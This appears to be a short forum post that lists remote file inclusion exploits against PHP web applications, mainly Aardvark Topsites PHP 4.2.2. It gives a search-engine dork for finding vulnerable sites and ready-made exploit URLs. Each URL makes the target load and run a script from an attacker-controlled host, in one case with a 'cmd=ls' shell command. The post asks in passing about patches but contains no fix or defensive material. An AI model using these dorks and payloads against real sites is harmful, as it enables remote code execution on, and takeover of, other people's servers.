WATCH out for these and tell me if you have developed a method/patch for fixing them, these exploits are highly volatile.
Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
URL:
http://www.aardvarktopsitesphp.com/
Dork: "Powered By Aardvark Topsites PHP 4.2.2"
Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls
-------------------------------------------------------------------------------------------------------------------
Exploitation: remote file inclusion
/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?
Recent comments
20 hours 45 min ago
1 day 1 hour ago
1 day 6 hours ago
1 day 8 hours ago
1 day 22 hours ago
1 day 22 hours ago
2 days 3 hours ago
2 days 9 hours ago
2 days 10 hours ago
2 days 12 hours ago